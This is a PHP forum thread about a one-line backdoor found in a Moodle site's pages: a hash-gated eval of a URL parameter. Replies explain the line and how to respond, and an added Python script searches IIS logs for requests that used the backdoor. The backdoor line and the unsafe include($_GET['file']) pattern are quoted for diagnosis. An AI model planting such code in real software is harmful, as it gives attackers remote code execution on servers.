Newbie Question sorry


JacH

I am completely new to PHP.

 

Could someone just explain this line of code to me?

 

 

if ( md5(@$_GET["rnk"]) == "2d8580663839881184c4acff7e0af63d" ) eval (stripcslashes (@$_GET["cd"]));

 

It was placed at the top of 3 of our web pages - I guess the string is an encryption and is a hack of some sort

 

thanks

https://forums.phpfreaks.com/topic/144924-newbie-question-sorry/

Well the md5 is a sort of encryption while the @ symbol in front of the variables will cause them to not show errors so you won't notice them being there.

 

If this was placed at the top of some of your files (possibly more) I would definitely tighten up security on your web server.

It checks if the md5() of $_GET["rnk"] is equal to the value shown and if it is it executes the php code that was supplied in $_GET["cd"].

 

You could check your server logs to see what sort of PHP code was supplied on the end of the URLs in $_GET["cd"].

 

Of greater concern is how your files were modified to add the line of code to them in the first place.

Sounds like you have been hacked to me. That will allow any user who knows the hash for rnk to execute any code on your server.

 

Scary stuff man. Check logs, contact host and remove that from every page it is on.

 

If your site has an uploader, I would look into that to increase security on it, as that could be the source, or if you allow dynamic including of files, "include($_GET['file'])" I would also look into securing that too.

Thanks guys for all your replies.

 

Yep we have found a small door in our IIS (we are using IIS and PHP to run Moodle) so we are now modifying our permissions.

 

I can only hope we have found it in time, as only one of the files led to some dysfunctionality, but noticing the date it was modified led us to the other 3.
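
The log check suggested in the replies above, as an added example that is not part of the original thread: it reads IIS logs in W3C extended format and lists every request that carried both the `rnk` and `cd` parameters, with the PHP that was sent in `cd` URL-decoded. The function name, the field layout and the sample log lines are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs

# Constructed sample in IIS W3C extended log format (not from the original thread).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2009-02-10 03:12:44 203.0.113.7 GET /moodle/index.php rnk=example&cd=echo%20%22test%22%3B 200
2009-02-10 03:13:02 198.51.100.20 GET /moodle/course/view.php id=4 200
2009-02-10 03:15:31 203.0.113.7 GET /moodle/login/index.php cd=echo+1%3B&rnk=example 200
2009-02-10 03:16:00 198.51.100.20 GET /moodle/index.php - 200
"""

def find_backdoor_requests(log_text, key_param="rnk", code_param="cd"):
    """Return requests whose query string carries both backdoor parameters."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue                       # skip other directives and blank lines
        row = dict(zip(fields, line.split()))
        query = row.get("cs-uri-query", "-")
        if query == "-":                   # IIS logs "-" when there is no query string
            continue
        params = parse_qs(query, keep_blank_values=True)
        if key_param in params and code_param in params:
            hits.append({
                "when": f'{row.get("date", "?")} {row.get("time", "?")}',
                "client": row.get("c-ip", "?"),
                "page": row.get("cs-uri-stem", "?"),
                "code": params[code_param][0],   # URL-decoded PHP that was sent
            })
    return hits

if __name__ == "__main__":
    for hit in find_backdoor_requests(SAMPLE_LOG):
        print(hit["when"], hit["client"], hit["page"], repr(hit["code"]))
```

The hits give the time window, the client addresses and the pages that were called, which can be compared with the modification dates of the altered files. The decoded value is shown as received, before the `stripcslashes()` step the backdoor applies.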
